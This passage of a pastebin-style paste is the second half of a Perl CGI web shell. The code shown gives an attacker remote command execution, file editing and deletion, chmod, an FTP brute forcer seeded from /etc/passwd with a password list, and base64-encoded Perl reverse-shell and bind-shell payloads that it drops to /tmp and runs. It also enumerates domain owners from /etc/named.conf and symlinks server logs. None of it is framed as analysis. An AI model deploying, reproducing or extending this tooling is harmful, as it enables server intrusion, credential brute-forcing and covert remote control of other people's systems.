  882. $_ =~ s/(\n|\r\n)$//;
  883. $result .= &HtmlSpecialChars("$_\n");
  884. }
  885. $|=0;
  886. }
  887. else # show output after command completes
  888. {
  889. $result .= &HtmlSpecialChars('$Command');
  890. }
  891. if(!$WinNT)
  892. {
  893. alarm(0);
  894. }
  895. return $result;
  896. }
  897. #==============================================================================
  898. # Form Save File
  899. #==============================================================================
  900. sub SaveFileForm
  901. {
  902. my $result ="";
  903. substr($RunCommand,0,5)="";
  904. my $file=&trim($RunCommand);
  905. $save='<br><input name="a" type="submit" value="save" class="submit" >';
  906. $File=$CurrentDir.$PathSep.$RunCommand;
  907. my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
  908. if(-w $File)
  909. {
  910. $rows="23"
  911. }else
  912. {
  913. $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
  914. $rows="20"
  915. }
  916. $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
  917. $read=($WinNT)?"type":"less";
  918. $RunCommand = "$read \"$RunCommand\"";
  919. $result .= <<END;
  920. <form name="f" method="POST" action="$ScriptLocation">
  921.  
  922. <input type="hidden" name="d" value="$CurrentDir">
  923. $Prompt
  924. <input type="text" size="40" name="c">
  925. <input name="s" class="submit" type="submit" value="Enter">
  926. <br>Command: <run> $RunCommand </run>
  927. <input type="hidden" name="file" value="$file" > $save <br> $msg
  928. <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
  929. END
  930.  
  931. $result .= &RunCmd;
  932. $result .= "</textarea>";
  933. $result .= "</form>";
  934. return $result;
  935. }
  936. #==============================================================================
  937. # Save File
  938. #==============================================================================
  939. sub SaveFile($)
  940. {
  941. my $Data= shift ;
  942. my $File= shift;
  943. $File=$CurrentDir.$PathSep.$File;
  944. if(open(FILE, ">$File"))
  945. {
  946. binmode FILE;
  947. print FILE $Data;
  948. close FILE;
  949. return 1;
  950. }else
  951. {
  952. return 0;
  953. }
  954. }
  955. #------------------------------------------------------------------------------
  956. # Brute Forcer Form
  957. #------------------------------------------------------------------------------
  958. sub BruteForcerForm
  959. {
  960. my $result="";
  961. $result .= <<END;
  962.  
  963. <table>
  964.  
  965. <tr>
  966. <td colspan="2" align="center">
  967. ####################################<br>
  968. Simple FTP brute forcer<br>
  969. ####################################
  970. <form name="f" method="POST" action="$ScriptLocation">
  971.  
  972. <input type="hidden" name="a" value="bruteforcer"/>
  973. </td>
  974. </tr>
  975. <tr>
  976. <td>User:<br><textarea rows="18" cols="30" name="user">
  977. END
  978. chop($result .= `less /etc/passwd | cut -d: -f1`);
  979. $result .= <<'END';
  980. </textarea></td>
  981. <td>
  982.  
  983. Pass:<br>
  984. <textarea rows="18" cols="30" name="pass">123pass
  985. 123!@#
  986. 123admin
  987. 123abc
  988. 123456admin
  989. 1234554321
  990. 12344321
  991. pass123
  992. admin
  993. admincp
  994. administrator
  995. matkhau
  996. passadmin
  997. p@ssword
  998. p@ssw0rd
  999. password
  1000. 123456
  1001. 1234567
  1002. 12345678
  1003. 123456789
  1004. 1234567890
  1005. 111111
  1006. 000000
  1007. 222222
  1008. 333333
  1009. 444444
  1010. 555555
  1011. 666666
  1012. 777777
  1013. 888888
  1014. 999999
  1015. 123123
  1016. 234234
  1017. 345345
  1018. 456456
  1019. 567567
  1020. 678678
  1021. 789789
  1022. 123321
  1023. 456654
  1024. 654321
  1025. 7654321
  1026. 87654321
  1027. 987654321
  1028. 0987654321
  1029. admin123
  1030. admin123456
  1031. abcdef
  1032. abcabc
  1033. !@#!@#
  1034. !@#$%^
  1035. !@#$%^&*(
  1036. !@#$$#@!
  1037. abc123
  1038. anhyeuem
  1039. iloveyou</textarea>
  1040. </td>
  1041. </tr>
  1042. <tr>
  1043. <td colspan="2" align="center">
  1044. Sleep:<select name="sleep">
  1045.  
  1046. <option>0</option>
  1047. <option>1</option>
  1048. <option>2</option>
  1049.  
  1050. <option>3</option>
  1051. </select>
  1052. <input type="submit" class="submit" value="Brute Forcer"/></td></tr>
  1053. </form>
  1054. </table>
  1055. END
  1056. return $result;
  1057. }
  1058. #------------------------------------------------------------------------------
  1059. # Brute Forcer
  1060. #------------------------------------------------------------------------------
  1061. sub BruteForcer
  1062. {
  1063. my $result="";
  1064. $Server=$ENV{'SERVER_ADDR'};
  1065. if($in{'user'} eq "")
  1066. {
  1067. $result .= &BruteForcerForm;
  1068. }else
  1069. {
  1070. use Net::FTP;
  1071. @user= split(/\n/, $in{'user'});
  1072. @pass= split(/\n/, $in{'pass'});
  1073. chomp(@user);
  1074. chomp(@pass);
  1075. $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
  1076. foreach $username (@user)
  1077. {
  1078. if(!($username eq ""))
  1079. {
  1080. foreach $password (@pass)
  1081. {
  1082. $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
  1083. if($ftp->login("$username","$password"))
  1084. {
  1085. $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
  1086. $ftp->quit();
  1087. break;
  1088. }
  1089. if(!($in{'sleep'} eq "0"))
  1090. {
  1091. sleep(int($in{'sleep'}));
  1092. }
  1093. $ftp->quit();
  1094. }
  1095. }
  1096. }
  1097. $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
  1098. }
  1099. return $result;
  1100. }
  1101. #------------------------------------------------------------------------------
  1102. # Backconnect Form
  1103. #------------------------------------------------------------------------------
  1104. sub BackBindForm
  1105. {
  1106. return <<END;
  1107. <br><br>
  1108.  
  1109. <table>
  1110. <tr>
  1111. <form name="f" method="POST" action="$ScriptLocation">
  1112. <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
  1113. <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
  1114. Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
  1115.  
  1116. <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
  1117. </form>
  1118. </tr>
  1119. <tr>
  1120. <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
  1121. <br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
  1122. <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
  1123.  
  1124. </tr>
  1125. </table>
  1126.  
  1127. <br><br>
  1128. <table>
  1129. <tr>
  1130. <form method="POST" action="$ScriptLocation">
  1131. <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
  1132.  
  1133. <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
  1134.  
  1135. Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
  1136. <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
  1137. </form>
  1138. </tr>
  1139. <tr>
  1140. <td colspan=3><font color=#FFFFFF>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
  1141.  
  1142. </tr>
  1143. </table><br>
  1144. END
  1145. }
  1146. #------------------------------------------------------------------------------
  1147. # Backconnect use perl
  1148. #------------------------------------------------------------------------------
  1149. sub BackBind
  1150. {
  1151. use MIME::Base64;
  1152. use Socket;
  1153. $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
  1154. $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";
  1155.  
  1156. $ClientAddr = $in{'clientaddr'};
  1157. $ClientPort = int($in{'clientport'});
  1158. if($ClientPort eq 0)
  1159. {
  1160. return &BackBindForm;
  1161. }elsif(!$ClientAddr eq "")
  1162. {
  1163. $Data=decode_base64($backperl);
  1164. if(-w "/tmp/")
  1165. {
  1166. $File="/tmp/backconnect.pl";
  1167. }else
  1168. {
  1169. $File=$CurrentDir.$PathSep."backconnect.pl";
  1170. }
  1171. open(FILE, ">$File");
  1172. print FILE $Data;
  1173. close FILE;
  1174. system("perl backconnect.pl $ClientAddr $ClientPort");
  1175. unlink($File);
  1176. exit 0;
  1177. }else
  1178. {
  1179. $Data=decode_base64($bindperl);
  1180. if(-w "/tmp")
  1181. {
  1182. $File="/tmp/bindport.pl";
  1183. }else
  1184. {
  1185. $File=$CurrentDir.$PathSep."bindport.pl";
  1186. }
  1187. open(FILE, ">$File");
  1188. print FILE $Data;
  1189. close FILE;
  1190. system("perl bindport.pl $ClientPort");
  1191. unlink($File);
  1192. exit 0;
  1193. }
  1194. }
  1195. #------------------------------------------------------------------------------
  1196. # Array List Directory
  1197. #------------------------------------------------------------------------------
  1198. sub RmDir($)
  1199. {
  1200. my $dir = shift;
  1201. if(opendir(DIR,$dir))
  1202. {
  1203. while($file = readdir(DIR))
  1204. {
  1205. if(($file ne ".") && ($file ne ".."))
  1206. {
  1207. $file= $dir.$PathSep.$file;
  1208. if(-d $file)
  1209. {
  1210. &RmDir($file);
  1211. }
  1212. else
  1213. {
  1214. unlink($file);
  1215. }
  1216. }
  1217. }
  1218. closedir(DIR);
  1219. }
  1220. if(!rmdir($dir))
  1221. {
  1222.  
  1223. }
  1224. }
  1225. sub FileOwner($)
  1226. {
  1227. my $file = shift;
  1228. if(-e $file)
  1229. {
  1230. ($uid,$gid) = (stat($file))[4,5];
  1231. if($WinNT)
  1232. {
  1233. return "???";
  1234. }
  1235. else
  1236. {
  1237. $name=getpwuid($uid);
  1238. $group=getgrgid($gid);
  1239. return $name."/".$group;
  1240. }
  1241. }
  1242. return "???";
  1243. }
  1244. sub ParentFolder($)
  1245. {
  1246. my $path = shift;
  1247. my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
  1248. chop($path = `$Comm`);
  1249. return $path;
  1250. }
  1251. sub FilePerms($)
  1252. {
  1253. my $file = shift;
  1254. my $ur = "-";
  1255. my $uw = "-";
  1256. if(-e $file)
  1257. {
  1258. if($WinNT)
  1259. {
  1260. if(-r $file){ $ur = "r"; }
  1261. if(-w $file){ $uw = "w"; }
  1262. return $ur . " / " . $uw;
  1263. }else
  1264. {
  1265. $mode=(stat($file))[2];
  1266. $result = sprintf("%04o", $mode & 07777);
  1267. return $result;
  1268. }
  1269. }
  1270. return "0000";
  1271. }
  1272. sub FileLastModified($)
  1273. {
  1274. my $file = shift;
  1275. if(-e $file)
  1276. {
  1277. ($la) = (stat($file))[9];
  1278. ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
  1279. $y = $y + 1900;
  1280. @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
  1281. $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
  1282. return $lmtime;
  1283. }
  1284. return "???";
  1285. }
  1286. sub FileSize($)
  1287. {
  1288. my $file = shift;
  1289. if(-f $file)
  1290. {
  1291. return -s $file;
  1292. }
  1293. return "0";
  1294.  
  1295. }
  1296. sub ParseFileSize($)
  1297. {
  1298. my $size = shift;
  1299. if($size <= 1024)
  1300. {
  1301. return $size. " B";
  1302. }
  1303. else
  1304. {
  1305. if($size <= 1024*1024)
  1306. {
  1307. $size = sprintf("%.02f",$size / 1024);
  1308. return $size." KB";
  1309. }
  1310. else
  1311. {
  1312. $size = sprintf("%.2f",$size / 1024 / 1024);
  1313. return $size." MB";
  1314. }
  1315. }
  1316. }
  1317. sub trim($)
  1318. {
  1319. my $string = shift;
  1320. $string =~ s/^\s+//;
  1321. $string =~ s/\s+$//;
  1322. return $string;
  1323. }
  1324. sub AddSlashes($)
  1325. {
  1326. my $string = shift;
  1327. $string=~ s/\\/\\\\/g;
  1328. return $string;
  1329. }
  1330. sub ListDir
  1331. {
  1332. my $path = $CurrentDir.$PathSep;
  1333. $path=~ s/\\\\/\\/g;
  1334. my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
  1335. if(-d $path)
  1336. {
  1337. my @fname = ();
  1338. my @dname = ();
  1339. if(opendir(DIR,$path))
  1340. {
  1341. while($file = readdir(DIR))
  1342. {
  1343. $f=$path.$file;
  1344. if(-d $f)
  1345. {
  1346. push(@dname,$file);
  1347. }
  1348. else
  1349. {
  1350. push(@fname,$file);
  1351. }
  1352. }
  1353. closedir(DIR);
  1354. }
  1355. @fname = sort { lc($a) cmp lc($b) } @fname;
  1356. @dname = sort { lc($a) cmp lc($b) } @dname;
  1357. $result .= "<div><table width='90%' class='listdir'>
  1358.  
  1359. <tr style='background-color: #3e3e3e'><th>File Name</th>
  1360. <th style='width:100px;'>File Size</th>
  1361. <th style='width:150px;'>Owner</th>
  1362. <th style='width:100px;'>Permission</th>
  1363. <th style='width:150px;'>Last Modified</th>
  1364. <th style='width:260px;'>Action</th></tr>";
  1365. my $style="line";
  1366. my $i=0;
  1367. foreach my $d (@dname)
  1368. {
  1369. $style= ($style eq "line") ? "notline": "line";
  1370. $d = &trim($d);
  1371. $dirname=$d;
  1372. if($d eq "..")
  1373. {
  1374. $d = &ParentFolder($path);
  1375. }
  1376. elsif($d eq ".")
  1377. {
  1378. $d = $path;
  1379. }
  1380. else
  1381. {
  1382. $d = $path.$d;
  1383. }
  1384. $result .= "<tr class='$style'>
  1385.  
  1386. <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
  1387. $result .= "<td>DIR</td>";
  1388. $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
  1389. $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
  1390. $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
  1391. $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a> | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
  1392. $result .= "</tr>";
  1393. $i++;
  1394. }
  1395. foreach my $f (@fname)
  1396. {
  1397. $style= ($style eq "line") ? "notline": "line";
  1398. $file=$f;
  1399. $f = $path.$f;
  1400. $view = "?dir=".$path."&view=".$f;
  1401. $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
  1402. $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
  1403. $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
  1404. $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
  1405. $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
  1406. $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
  1407. $result .= "</tr>";
  1408. $i++;
  1409. }
  1410. $result .= "</table></div>";
  1411. }
  1412. return $result;
  1413. }
  1414. #------------------------------------------------------------------------------
  1415. # Try to View List User
  1416. #------------------------------------------------------------------------------
  1417. sub ViewDomainUser
  1418. {
  1419. open (domains, '/etc/named.conf') or $err=1;
  1420. my @cnzs = <domains>;
  1421. close d0mains;
  1422. my $style="line";
  1423. my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
  1424. if ($err)
  1425. {
  1426. $result .= ('<p>C0uldn\'t Bypass it , Sorry</p>');
  1427. return $result;
  1428. }else
  1429. {
  1430. $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
  1431. }
  1432. foreach my $one (@cnzs)
  1433. {
  1434. if($one =~ m/.*?zone "(.*?)" {/)
  1435. {
  1436. $style= ($style eq "line") ? "notline": "line";
  1437. $filename= "/etc/valiases/".$one;
  1438. $owner = getpwuid((stat($filename))[4]);
  1439. $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
  1440. }
  1441. }
  1442. $result .= '</table>';
  1443. return $result;
  1444. }
  1445. #------------------------------------------------------------------------------
  1446. # View Log
  1447. #------------------------------------------------------------------------------
  1448. sub ViewLog
  1449. {
  1450. if($WinNT)
  1451. {
  1452. return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
  1453. }
  1454. my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
  1455. my @pathlog=(
  1456. '/usr/local/apache/logs/error_log',
  1457. '/var/log/httpd/error_log',
  1458. '/usr/local/apache/logs/access_log'
  1459. );
  1460. my $i=0;
  1461. my $perms;
  1462. my $sl;
  1463. foreach my $log (@pathlog)
  1464. {
  1465. if(-w $log)
  1466. {
  1467. $perms="OK";
  1468. }else
  1469. {
  1470. chop($sl = `ln -s $log error_log_$i`);
  1471. if(&trim($ls) eq "")
  1472. {
  1473. if(-r $ls)
  1474. {
  1475. $perms="OK";
  1476. $log="error_log_".$i;
  1477. }
  1478. }else
  1479. {
  1480. $perms="<font style='color: red;'>Cancel<font>";
  1481. }
  1482. }
  1483. $result .=<<END;
  1484. <tr>
  1485.  
  1486. <form action="" method="post">
  1487. <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
  1488. <td><input class="submit" type="submit" value="Try" /></td>
  1489. <input type="hidden" id="log_$i" name="c" value="less $log"/>
  1490. <input type="hidden" name="a" value="command" />
  1491. <input type="hidden" name="d" value="$CurrentDir" />
  1492. </form>
  1493. <td>$perms</td>
  1494.  
  1495. </tr>
  1496. END
  1497. $i++;
  1498. }
  1499. $result .="</table>";
  1500. return $result;
  1501. }
  1502. #------------------------------------------------------------------------------
  1503. # Main Program - Execution Starts Here
  1504. #------------------------------------------------------------------------------
  1505. &ReadParse;
  1506. &GetCookies;
  1507.  
  1508. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  1509. $ServerName = $ENV{'SERVER_NAME'};
  1510. $LoginPassword = $in{'p'};
  1511. $RunCommand = $in{'c'};
  1512. $TransferFile = $in{'f'};
  1513. $Options = $in{'o'};
  1514. $Action = $in{'a'};
  1515.  
  1516. $Action = "command" if($Action eq ""); # no action specified, use default
  1517.  
  1518. # get the directory in which the commands will be executed
  1519. $CurrentDir = &trim($in{'d'});
  1520. # mac dinh xuat thong tin neu ko co lenh nao!
  1521. $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
  1522. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  1523.  
  1524. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  1525.  
  1526. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  1527. {
  1528. &PerformLogin;
  1529. }elsif($Action eq "gui") # GUI directory
  1530. {
  1531. &PrintPageHeader;
  1532. if(!$WinNT)
  1533. {
  1534. $chmod=int($in{'chmod'});
  1535. if(!($chmod eq 0))
  1536. {
  1537. $chmod=int($in{'chmod'});
  1538. $file=$CurrentDir.$PathSep.$TransferFile;
  1539. chop($result= `chmod $chmod "$file"`);
  1540. if(&trim($result) eq "")
  1541. {
  1542. print "<run> Done! </run><br>";
  1543. }else
  1544. {
  1545. print "<run> Sorry! You dont have permissions! </run><br>";
  1546. }
  1547. }
  1548. }
  1549. $rename=$in{'rename'};
  1550. if(!$rename eq "")
  1551. {
  1552. if(rename($TransferFile,$rename))
  1553. {
  1554. print "<run> Done! </run><br>";
  1555. }else
  1556. {
  1557. print "<run> Sorry! You dont have permissions! </run><br>";
  1558. }
  1559. }
  1560. $remove=$in{'remove'};
  1561. if($remove ne "")
  1562. {
  1563. $rm = $CurrentDir.$PathSep.$remove;
  1564. if(-d $rm)
  1565. {
  1566. &RmDir($rm);
  1567. }else
  1568. {
  1569. if(unlink($rm))
  1570. {
  1571. print "<run> Done! </run><br>";
  1572. }else
  1573. {
  1574. print "<run> Sorry! You dont have permissions! </run><br>";
  1575. }
  1576. }
  1577. }
  1578. print &ListDir;
  1579.  
  1580. }
  1581. elsif($Action eq "command") # user wants to run a command
  1582. {
  1583. &PrintPageHeader("c");
  1584. print &ExecuteCommand;
  1585. }
  1586. elsif($Action eq "save") # user wants to save a file
  1587. {
  1588. &PrintPageHeader;
  1589. if(&SaveFile($in{'data'},$in{'file'}))
  1590. {
  1591. print "<run> Done! </run><br>";
  1592. }else
  1593. {
  1594. print "<run> Sorry! You dont have permissions! </run><br>";
  1595. }
  1596. print &ListDir;
  1597. }
  1598. elsif($Action eq "upload") # user wants to upload a file
  1599. {
  1600. &PrintPageHeader;
  1601.  
  1602. print &UploadFile;
  1603. }
  1604. elsif($Action eq "backbind") # user wants to back connect or bind port
  1605. {
  1606. &PrintPageHeader("clientport");
  1607. print &BackBind;
  1608. }
  1609. elsif($Action eq "bruteforcer") # user wants to brute force
  1610. {
  1611. &PrintPageHeader;
  1612. print &BruteForcer;
  1613. }elsif($Action eq "download") # user wants to download a file
  1614. {
  1615. print &DownloadFile;
  1616. }elsif($Action eq "checklog") # user wants to view log file
  1617. {
  1618. &PrintPageHeader;
  1619. print &ViewLog;
  1620.  
  1621. }elsif($Action eq "domainsuser") # user wants to view list user/domain
  1622. {
  1623. &PrintPageHeader;
  1624. print &ViewDomainUser;
  1625. }elsif($Action eq "logout") # user wants to logout
  1626. {
  1627. &PerformLogout;
  1628. }
  1629. &PrintPageFooter;
RAW Paste Data